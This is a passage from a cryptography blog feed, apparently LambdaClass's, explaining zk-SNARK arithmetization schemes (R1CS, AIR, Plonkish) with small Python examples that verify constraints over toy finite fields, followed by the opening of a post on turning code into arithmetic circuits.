&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Machine computations. STARKs use this approach.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Circuit computations are better for unstructured computations and support composability with relative ease. On the other hand, machine computations are better for uniform computations and support unbounded computations.&lt;&#x2F;p&gt;
&lt;p&gt;Some operations can be easily transformed into arithmetic operations, either because they are algebraic operations over a finite field or because we can translate them with some slight changes into those. This leads to a shift in thought about what is an expensive or straightforward computation. For example, stream ciphers are efficient encryption schemes, performing XOR operations between the plaintext (the message we want to encrypt) and a keystream (a pseudorandom string of bits), which the processor can calculate very fast. However, in terms of their arithmetization and the number of equations we need to describe them (that is, the number of constraints), they are expensive operations for SNARKs. Examples of costly operations for SNARKs are bitwise operations (AND, XOR, OR), bound checks, and comparisons (because these require breaking the variable into bits).&lt;&#x2F;p&gt;
&lt;p&gt;The arithmetization adds significant overhead to the computation time. There can be nearly two orders of magnitude increase in computation time using SNARK-friendly operations and more for non-friendly operations.&lt;&#x2F;p&gt;
&lt;p&gt;Recently, many different optimizations have been presented to reduce the overhead, such as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Lookup tables.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * SNARK-friendly cryptographic primitives (such as [Rescue](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2020&#x2F;1143.pdf), [SAVER](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;1270.pdf) or [Poseidon](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;458)).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Concurrent proof generation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hardware acceleration (such as using GPU or FPGA).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In general, arithmetization cannot be done manually except for elementary programs. Besides, the use of naïve arithmetization can lead to significant overhead. To deal with this, dedicated compilers accepting high-level programming languages have been developed, as well as zero-knowledge virtual machines, such as CAIRO. We will examine the most popular schemes, R1CS, AIR, and plonkish arithmetization.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;r1cs&quot;&gt;R1CS&lt;&#x2F;h2&gt;
&lt;p&gt;Arithmetic circuits can be expressed as (quadratic) rank one constraint systems (R1CS). These are systems of equations, each at most quadratic in each variable, of the form&lt;br &#x2F;&gt;
\[ (\sum_k A_{ik} z_k)(\sum_k B_{ik}z_k)-(\sum_k C_{ik}z_k)=0 \]&lt;br &#x2F;&gt;
where \( A_{ik}, B_{ik}, C_{ik} \) are elements in some finite field \( \mathbb{F} \), with many of them zero. We can write down any complex computation in this way. For example, if we want to calculate \( w=x^4 \) we can express this as&lt;br &#x2F;&gt;
\( x\times x= w_1 \)&lt;br &#x2F;&gt;
\( w_1 \times w_1=w \)&lt;br &#x2F;&gt;
where we have introduced an additional variable, \( w_1 \), for which we have to decide whether it will be public or private. It is important to note that the R1CS describing a given computation is not unique. For example, we could have expressed the previous computation as&lt;br &#x2F;&gt;
\( x\times x= w_1 \)&lt;br &#x2F;&gt;
\( x\times w_1= w_2 \)&lt;br &#x2F;&gt;
\( x\times w_2= w \)&lt;br &#x2F;&gt;
This system is equivalent to the previous one but has one more constraint.&lt;&#x2F;p&gt;
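&lt;p&gt;A minimal Python sketch (with the matrices and a small field size chosen by us for illustration) shows how satisfaction of such a system is checked: we build \( A \), \( B \), and \( C \) for the two constraints of \( w=x^4 \) and verify the quadratic relation row by row.&lt;&#x2F;p&gt;

```python
p = 97  # small prime field chosen for illustration

def dot(row, z):
    return sum(r * v for r, v in zip(row, z)) % p

def r1cs_satisfied(A, B, C, z):
    """Check (A_i . z)(B_i . z) - (C_i . z) = 0 for every constraint row i."""
    return all((dot(a, z) * dot(b, z) - dot(c, z)) % p == 0
               for a, b, c in zip(A, B, C))

# z = (1, x, w1, w) encodes w = x^4 via x*x = w1 and w1*w1 = w.
A = [[0, 1, 0, 0], [0, 0, 1, 0]]
B = [[0, 1, 0, 0], [0, 0, 1, 0]]
C = [[0, 0, 1, 0], [0, 0, 0, 1]]

x = 3
z = [1, x, (x * x) % p, pow(x, 4, p)]
assert r1cs_satisfied(A, B, C, z)
assert not r1cs_satisfied(A, B, C, [1, x, (x * x) % p, 5])  # wrong w fails
```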
&lt;p&gt;To implement R1CS, programs have gadgets, allowing one to construct arithmetic circuits modularly. For example, if we want to work with a boolean variable, we can have a gadget implementing the constraints, such that the variable only takes the values 0 or 1. If we call the variable \( b \), then&lt;br &#x2F;&gt;
\( b(1-b)= 0 \)&lt;br &#x2F;&gt;
If we want to perform an OR operation between \( a \) and \( b \), then the boolean gadget implements also&lt;br &#x2F;&gt;
\( a(1-a)=0 \)&lt;br &#x2F;&gt;
while the OR gadget adds&lt;br &#x2F;&gt;
\( a+b-ab=c \)&lt;&#x2F;p&gt;
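&lt;p&gt;We can check these gadget constraints directly. The following Python sketch (field modulus chosen arbitrarily for the example) confirms that \( a+b-ab=c \) reproduces the OR truth table and that the booleanity constraint rejects non-boolean values.&lt;&#x2F;p&gt;

```python
p = 97  # field modulus chosen for illustration

def or_gadget_holds(a, b, c):
    """Boolean constraints a(1-a)=0 and b(1-b)=0, plus OR constraint a+b-ab=c."""
    return ((a * (1 - a)) % p == 0
            and (b * (1 - b)) % p == 0
            and (a + b - a * b - c) % p == 0)

# The constraint matches the logical OR on all boolean inputs.
for a in (0, 1):
    for b in (0, 1):
        assert or_gadget_holds(a, b, a | b)

assert not or_gadget_holds(2, 0, 2)  # 2 is not boolean: 2*(1-2) = -2 != 0
assert not or_gadget_holds(1, 1, 0)  # wrong output value fails
```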
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&#x2F;snark&#x2F;tree&#x2F;master&#x2F;relations&#x2F;src&quot;&gt;Arkworks&lt;&#x2F;a&gt; library contains gadgets for basic data types and operations. Common expressions for operators and range checks can be found in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zips.z.cash&#x2F;protocol&#x2F;protocol.pdf&quot;&gt;Zcash protocol specification&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;algebraic-intermediate-representation-air&quot;&gt;Algebraic intermediate representation (AIR)&lt;&#x2F;h2&gt;
&lt;p&gt;Algebraic Intermediate Representation (AIR) is the arithmetization procedure used by StarkWare in their virtual machine, CAIRO (CPU AIR). The AIR consists of the three following elements:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The execution trace of the computation. This is expressed as a trace execution matrix, \\( T \\), whose rows represent the computation state at a given time point and whose columns correspond to an algebraic register tracked over all the computation steps.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Transition constraints enforce the relations between two or more rows of the trace matrix \\( T \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Boundary constraints enforce equalities between some cells of the execution and constant values.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The arithmetization takes place in two stages:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Generating the execution trace and the low-degree polynomial constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Transforming the previous two into a single univariate polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The set of polynomial constraints is constructed so that they are all verified if and only if the execution trace is valid (that is, if the trace represents a valid computation). The constraints are low-degree polynomials but are not necessarily restricted to degree \( 2 \), as in the case of R1CS.&lt;&#x2F;p&gt;
&lt;p&gt;To see how AIR works, let us look at a few examples. Suppose that we want to add all the elements in a given vector of size \( n \), \( a=(a_1,a_2,a_3,\dots,a_n) \). We could introduce a variable \( t \) starting at \( 0 \) which, at each step, adds the value of one of the components of \( a \). The trace matrix contains two columns: the first holds the elements of \( a \), and the second the partial sums \( t \)&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Row&lt;&#x2F;th&gt;&lt;th&gt;\( a \)&lt;&#x2F;th&gt;&lt;th&gt;\( t \)&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;\( a_1 \)&lt;&#x2F;td&gt;&lt;td&gt;\( 0 \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;\( a_2 \)&lt;&#x2F;td&gt;&lt;td&gt;\( a_1 \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;\( a_3 \)&lt;&#x2F;td&gt;&lt;td&gt;\( a_1+a_2 \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;\( a_4 \)&lt;&#x2F;td&gt;&lt;td&gt;\( a_1+a_2+a_3 \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;\( \vdots \)&lt;&#x2F;td&gt;&lt;td&gt;\( \vdots \)&lt;&#x2F;td&gt;&lt;td&gt;\( \vdots \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;n&lt;&#x2F;td&gt;&lt;td&gt;\( a_n \)&lt;&#x2F;td&gt;&lt;td&gt;\( \sum_{k=1}^{n-1} a_k \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;n+1&lt;&#x2F;td&gt;&lt;td&gt;\( \sum_{k=1}^{n} a_k \)&lt;&#x2F;td&gt;&lt;td&gt;\( \sum_{k=1}^{n} a_k \)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The following polynomial constraints can summarize the correctness of the computation:&lt;br &#x2F;&gt;
\( t_1=0 \)&lt;br &#x2F;&gt;
\( t_{j+1}-t_j-a_j=0 \) for \( j=1,2,…,n \)&lt;br &#x2F;&gt;
\( a_{n+1}-t_{n+1}=0 \)&lt;&#x2F;p&gt;
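&lt;p&gt;As a quick sanity check (a toy sketch of our own, with an arbitrary small prime field and input vector), we can build this trace and verify the three constraints directly:&lt;&#x2F;p&gt;

```python
# Build the running-sum trace and check the AIR constraints over F_97.
P = 97  # toy prime field, chosen only for illustration

def build_trace(a):
    """Return the two trace columns: a (padded with the total) and t."""
    t = [0]
    for x in a:
        t.append((t[-1] + x) % P)
    # the last row of column a holds the final total, matching the table above
    return a + [t[-1]], t

a = [3, 5, 7, 11]
col_a, col_t = build_trace(a)

assert col_t[0] == 0                                   # boundary: t_1 = 0
for j in range(len(a)):                                # transitions
    assert (col_t[j + 1] - col_t[j] - col_a[j]) % P == 0
assert col_a[-1] == col_t[-1]                          # boundary: a_{n+1} = t_{n+1}
```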
&lt;p&gt;The advantage, in this case, is that the polynomial equations are not constrained to degree two or less. Multiplicative inverses, \( x^{-1} \), such that \( x \times x^{-1}=1 \) can be written down in two equivalent forms:&lt;br &#x2F;&gt;
\( x^{p-2}=y \)&lt;br &#x2F;&gt;
\( x\times y -1 =0 \)&lt;br &#x2F;&gt;
The first expression uses Fermat’s little theorem and involves a gate of degree \( p-2 \), while the second has degree 2.&lt;&#x2F;p&gt;
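&lt;p&gt;We can verify that both forms agree with a small example (the field size \( p=97 \) and the value of \( x \) are our own toy choices):&lt;&#x2F;p&gt;

```python
# The inverse via Fermat's little theorem (degree p-2) satisfies the
# degree-2 constraint x*y - 1 = 0 for the same witness y.
p = 97
x = 42
y = pow(x, p - 2, p)        # x^(p-2) mod p
assert (x * y - 1) % p == 0  # the low-degree form holds for the same y
```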
&lt;p&gt;The procedure for AIR as used in STARKs follows these steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Get the execution trace.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Perform low-degree extension.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Evaluate constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Compose constraints into the compositional polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The low-degree extension works as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Take each register (each column of the execution trace matrix) as evaluations of some polynomial, \\( f \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Interpolate the \\( f \\) over the trace domain to find its coefficients.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Evaluate \\( f \\) over a larger domain.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The easiest way to do this is by using the number-theoretic transform (the finite field version of the fast Fourier transform). We need to select a finite field that contains the n-th roots of unity, \( w_k \), such that \( w_k^n=1 \), where \( n \) is a power of 2 (\( n=2^m \)) larger than the number of rows. To obtain all the n-th roots, we can take powers of a generator, \( \omega \): \( \omega^0=1, \omega=w_1, \omega^2=w_2,…\), etc. To perform a low-degree extension, we can increase the domain by adding the 2n-th roots of unity and take advantage of our previous evaluations (or the 4n-th roots of unity, leading to a 4x blowup).&lt;&#x2F;p&gt;
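&lt;p&gt;The idea can be sketched over a tiny field (this is our own toy example using naïve Lagrange interpolation in \( \mathbb{F}_{17} \) in place of the NTT; a real prover would use the transform for speed):&lt;&#x2F;p&gt;

```python
# Low-degree extension over F_17: read a trace column as evaluations on the
# 4th roots of unity, interpolate, then evaluate on the 8th roots (2x blowup).
p = 17
w4, w8 = 13, 9  # 13 generates the 4th roots of unity mod 17; 9 the 8th (9^2 = 13)
small = [pow(w4, k, p) for k in range(4)]
large = [pow(w8, k, p) for k in range(8)]

def poly_mul_linear(poly, r):
    """Multiply a coefficient list (low degree first) by (X - r) over F_p."""
    out = [0] * (len(poly) + 1)
    for i, c in enumerate(poly):
        out[i] = (out[i] - c * r) % p
        out[i + 1] = (out[i + 1] + c) % p
    return out

def interpolate(xs, ys):
    """Lagrange interpolation over F_p; returns coefficients, low degree first."""
    coeffs = [0] * len(xs)
    for i, xi in enumerate(xs):
        num, denom = [1], 1
        for j, xj in enumerate(xs):
            if i != j:
                num = poly_mul_linear(num, xj)
                denom = denom * (xi - xj) % p
        scale = ys[i] * pow(denom, p - 2, p) % p
        coeffs = [(c + scale * n) % p for c, n in zip(coeffs, num)]
    return coeffs

def evaluate(coeffs, x):
    acc = 0
    for c in reversed(coeffs):  # Horner's rule
        acc = (acc * x + c) % p
    return acc

trace_column = [3, 1, 4, 1]              # toy register values
f = interpolate(small, trace_column)
extension = [evaluate(f, x) for x in large]
# the extension still agrees with the trace on the original domain
assert [evaluate(f, x) for x in small] == trace_column
```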
&lt;p&gt;To evaluate the constraints,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Define the algebraic relations between rows.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Reinterpret these relations as polynomials with roots at the points where the conditions hold.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Divide out roots from constraint polynomials to convert them into rational constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For example, if we have some relation between the rows, such as&lt;br &#x2F;&gt;
\( r_{k+2} = r_{k+1}^2+2r_{k} \)&lt;br &#x2F;&gt;
we can interpret this as some polynomial \( f \) and associate each step with \( x_k=\omega^k \), so&lt;br &#x2F;&gt;
\( f(x \omega^2)=(f(x \omega)^2+2 f(x)) \)&lt;br &#x2F;&gt;
The polynomial&lt;br &#x2F;&gt;
\( p(x)=f(x \omega^2)-(f(x \omega)^2+2 f(x)) \)&lt;br &#x2F;&gt;
has roots at the points \( x \) where the relation \( f \) holds.&lt;br &#x2F;&gt;
We can then take out the roots by dividing them by&lt;br &#x2F;&gt;
\( d(x)=\prod_k (x-\omega^k) \)&lt;br &#x2F;&gt;
where the product is carried out only over the values of \( k \) where the constraint holds. We get the required polynomial,&lt;br &#x2F;&gt;
\[ g(x)=\frac{p(x)}{d(x)} \]&lt;br &#x2F;&gt;
The following identity gives a practical result,&lt;br &#x2F;&gt;
\[ \prod_{k=0}^{n-1} (x-\omega^k) = x^n-1 \]&lt;br &#x2F;&gt;
So, if we know that the constraint holds on most \( \omega^k \), \( d(x) \) can be computed efficiently using that identity. For example, if \(n=256 \) and it holds for all rows, except \( k=128, 194 \), then&lt;br &#x2F;&gt;
\[ d(x) = \frac{x^n-1 }{(x-\omega^{128}) (x-\omega^{194}) }\]&lt;&#x2F;p&gt;
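&lt;p&gt;The vanishing-polynomial identity is easy to confirm numerically (our own toy check in \( \mathbb{F}_{17} \) with \( n=8 \)):&lt;&#x2F;p&gt;

```python
# Verify prod_{k=0}^{n-1} (x - w^k) = x^n - 1 for every x in F_17,
# where w = 9 is a primitive 8th root of unity mod 17.
p, n, w = 17, 8, 9
for x in range(p):
    prod = 1
    for k in range(n):
        prod = prod * (x - pow(w, k, p)) % p
    assert prod == (pow(x, n, p) - 1) % p
```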
&lt;p&gt;For our previous relationship&lt;br &#x2F;&gt;
\( r_{k+2} = r_{k+1}^2+2r_{k} \)&lt;br &#x2F;&gt;
say that \( r_1=1, r_2=5 \) and we want to compute the terms up to \( r_{1000} \). We will use \( n=1024 \) because this is the smallest power of \( 2 \) larger than \( 1000 \). In addition to the transition constraint being valid for all rows from \( 3 \) to \( 1000 \), we also have constraints for the two initial values:&lt;br &#x2F;&gt;
\( f(\omega^0)=1=f(1) \)&lt;br &#x2F;&gt;
\( f(\omega)=5 \)&lt;br &#x2F;&gt;
Therefore, we get some additional polynomials (if the conditions do hold):&lt;br &#x2F;&gt;
\[ p_1(x)=\frac{f(x)-1}{x-1} \]&lt;br &#x2F;&gt;
\[ p_2(x)=\frac{f(x)-5}{x-\omega} \]&lt;br &#x2F;&gt;
\[ p_3(x)=\frac{f(x \omega^2)-(f(x \omega)^2+2 f(x))}{d_3(x)} \]&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
\[ d_3(x) = \frac{x^{1024}-1 }{(x-1)(x-\omega) \prod_{k=1001}^{1023}(x-\omega^k) } \]&lt;br &#x2F;&gt;
We can finally obtain the compositional polynomial by taking a random linear combination of \( p_1,p_2,p_3 \):&lt;br &#x2F;&gt;
\[ P(x)=\alpha_1 p_1+\alpha_2 p_2+\alpha_3 p_3\]&lt;&#x2F;p&gt;
&lt;h2 id=&quot;plonkish-arithmetization&quot;&gt;Plonkish arithmetization&lt;&#x2F;h2&gt;
&lt;p&gt;The arithmetization used by Plonk is known as randomized algebraic intermediate representation with preprocessing (RAP, for short). TurboPlonk and UltraPlonk are restricted cases of RAP. As before, our starting point is the execution trace matrix, \( T \), consisting of \( n \) rows and \( w \) columns.&lt;&#x2F;p&gt;
&lt;p&gt;Plonk’s constraint system is written (considering two fan-in gates) as&lt;br &#x2F;&gt;
\[ q_L x_a+q_R x_b+q_O x_c+q_M x_a x_b +q_C=0 \]&lt;&#x2F;p&gt;
&lt;p&gt;This can represent the operations found in R1CS and allows for the implementation of custom gates. Plonk’s original arithmetization scheme consisted of encoding the computation trace into polynomials, for which we had to check the correctness of the wiring, that the polynomials encode the inputs correctly, that every gate is evaluated correctly, and the output of the last gate.&lt;&#x2F;p&gt;
&lt;p&gt;A preprocessed AIR (PAIR) extends the execution trace by adding new columns, \( c_1,c_2,…c_m \), which participate in the constraints. These variables allow us to change the relationship between different rows in the trace matrix. For example, we could alternate the operation performed between even and odd rows; we might want to have the following:&lt;br &#x2F;&gt;
\( x_{2n} = x_{2n-1}^2 \)&lt;br &#x2F;&gt;
\( x_{2n+1} = 2\times x_{2n} \)&lt;br &#x2F;&gt;
We can encode this relationship by doing&lt;br &#x2F;&gt;
\( c_1(x_n-x_{n-1}^2)+(1-c_1)(x_n-2x_{n-1})=0 \)&lt;br &#x2F;&gt;
where \( c_1=1 \) in even rows and \( c_1=0 \) in odd rows. Because we can use them to choose the operation we want to perform, they are called selectors. We can use more selectors to describe complex operations, such as elliptic curve addition.&lt;&#x2F;p&gt;
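&lt;p&gt;A minimal sketch of this selector (the starting value and field size are our own toy choices):&lt;&#x2F;p&gt;

```python
# A selector column c1 folds two different row transitions into one constraint:
# even rows square the previous value, odd rows double it.
p = 97
trace = [3]                      # hypothetical starting value x_0
selectors = [None]               # no transition constraint on row 0
for n in range(1, 7):
    if n % 2 == 0:               # even row: x_n = x_{n-1}^2
        trace.append(trace[-1] * trace[-1] % p)
        selectors.append(1)
    else:                        # odd row: x_n = 2 * x_{n-1}
        trace.append(2 * trace[-1] % p)
        selectors.append(0)

# the single selector-folded constraint covers both operations
for n in range(1, 7):
    c1, x_n, x_prev = selectors[n], trace[n], trace[n - 1]
    assert (c1 * (x_n - x_prev * x_prev) + (1 - c1) * (x_n - 2 * x_prev)) % p == 0
```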
&lt;p&gt;We can use the grand product check to check that two vectors \( a,b \) are permutations of each other. Given a random \( \gamma \) in the finite field \( \mathbb{F} \), the following equality should hold:&lt;br &#x2F;&gt;
\[ \prod (a_i+\gamma) = \prod (b_i+\gamma)\]&lt;br &#x2F;&gt;
Due to the Schwartz-Zippel lemma, we know that the probability that two distinct polynomials agree at a randomly sampled value is at most \( d&#x2F;\vert \mathbb{F} \vert \), where \( d \) is the degree of the polynomials and \( \vert \mathbb{F} \vert \) is the number of elements of the finite field.&lt;&#x2F;p&gt;
&lt;p&gt;To check that this operation has been carried out correctly, we can introduce one additional variable, \( v \), such that&lt;br &#x2F;&gt;
\( v_1=1 \)&lt;br &#x2F;&gt;
\( v_k=v_{k-1}\times (a_{k-1}+\gamma)&#x2F;(b_{k-1}+\gamma) \) for \( k=2,…,n+1 \)&lt;br &#x2F;&gt;
If the last value, \( v_{n+1} \), is equal to one, then we know, with very high probability, that the columns \( a,b \) are permutations of each other.&lt;&#x2F;p&gt;
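&lt;p&gt;The running-product column can be sketched as follows (our own toy example; here \( \gamma \) is fixed for illustration, whereas in the protocol the verifier samples it randomly):&lt;&#x2F;p&gt;

```python
# Grand product check: if b is a permutation of a, the running product v,
# built from (a_k + gamma)/(b_k + gamma), ends at 1.
p = 97
a = [5, 12, 7, 33]
b = [33, 5, 12, 7]               # a permutation of a
gamma = 42                        # in the protocol this is a random challenge

def inv(x):
    return pow(x, p - 2, p)       # field inverse via Fermat's little theorem

v = [1]                           # v_1 = 1
for ak, bk in zip(a, b):
    v.append(v[-1] * (ak + gamma) % p * inv(bk + gamma) % p)

assert v[-1] == 1                 # holds because b permutes a
```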
&lt;p&gt;Plonk allows one to include lookup arguments. These help us check that a given operation between two variables \( a,b \) yielding output \( c \) is correct by looking inside a table with precomputed valid triples \( (a,b,c) \). To do so, we need to incorporate a table \( t \) where the rows give all possible input&#x2F;output combinations. For example, we can take \( a,b \) to be 8-bit strings and provide the results of the XOR operation, \( c=a\oplus b \). This gives a total of \( 2^{16} \) combinations. To check that the result is correct, we can use a random variable, \( \beta \), and compute \( f_k=a_k+\beta b_k+\beta^2 c_k \) and \( g_k=t_{k1}+\beta t_{k2}+\beta^2 t_{k3} \), where \( t_{ki} \) are the elements of the table. We will cover these kinds of arguments in an upcoming post.&lt;&#x2F;p&gt;
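&lt;p&gt;The random-\( \beta \) compression of table rows can be sketched like this (our own toy version, with 4-bit strings instead of 8-bit to keep the table small, and a fixed \( \beta \) standing in for the random challenge):&lt;&#x2F;p&gt;

```python
# Compress each lookup triple (a, b, c) with powers of beta into one field
# element and test membership against the full 4-bit XOR table.
p = 65537
beta = 1234                       # in the protocol, sampled randomly

def compress(a, b, c):
    return (a + beta * b + beta * beta * c) % p

# the table of all valid 4-bit XOR triples, stored in compressed form
table = {compress(a, b, a ^ b) for a in range(16) for b in range(16)}

assert compress(9, 5, 9 ^ 5) in table          # a correct XOR row is found
assert compress(9, 5, (9 ^ 5) + 1) not in table  # a corrupted row is not
```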
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;One of the critical steps in the generation of zk-SNARKs for verifiable computation is transforming a given computer program into polynomials. This process is known as arithmetization, and we have some schemes to do it efficiently, such as R1CS, AIR, and Plonkish arithmetization. In the first one, we need gadgets to implement the data types (such as boolean, u8, and i64 variables) and their associated operations. In the case of AIR and Plonkish, we need to get the execution trace of the program, establish the relationships between the rows, and interpolate polynomials. Both approaches need to be carefully implemented, as naïve ways to do so can lead to a greater number of constraints and significant overhead. Fortunately, the development of new SNARK-friendly primitives, lookup arguments, custom gates, and hardware acceleration (such as the use of GPUs and FPGAs) can reduce the arithmetic complexity or increase the speed at which calculations are performed, enabling shorter proving and verifying times and opening the door to many new and exciting applications in the real world.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to transform code into arithmetic circuits</title>
          <pubDate>Sat, 14 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-transform-code-into-arithmetic-circuits/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-transform-code-into-arithmetic-circuits/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-transform-code-into-arithmetic-circuits/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The use of efficient &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;zk-SNARKs&lt;&#x2F;a&gt; (zero-knowledge succinct non-interactive arguments of knowledge) has given rise to many new and vital applications. For example, we can &lt;a href=&quot;&#x2F;decentralized-private-computations-zexe-and-veri-zexe&#x2F;&quot;&gt;delegate expensive computations&lt;&#x2F;a&gt; to untrusted servers and receive proof showing the integrity of the computations. This proof is short and can be verified much faster than the naïve approach of re-executing the whole calculation. How can this be possible? The key idea is that the integrity of the computation can be expressed as the solution or satisfiability of a non-deterministic polynomial (NP)-complete problem. Before we explain what NP-complete means, let’s look at an example. When you write down code in a high-level language, the compiler transforms it into machine code. It is then executed in the processor, which has dedicated circuits for performing the necessary operations. We can express any complex computation in the form of some circuit. The idea with SNARKs is that we can transform the code into an arithmetic circuit made of operations such as the addition and multiplication of integers and prove the correctness of the execution by checking that the values involved in the calculation satisfy the circuit.&lt;&#x2F;p&gt;
&lt;p&gt;An NP-complete problem is such that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * We can verify its solution in polynomial time. We can always find the answer by executing a brute-force search over all possibilities. These conditions correspond to the class NP.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * We can use the problem to simulate any other in the NP class.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Examples of NP-complete problems are circuit satisfiability, the graph coloring problem, and the traveling salesman problem.&lt;&#x2F;p&gt;
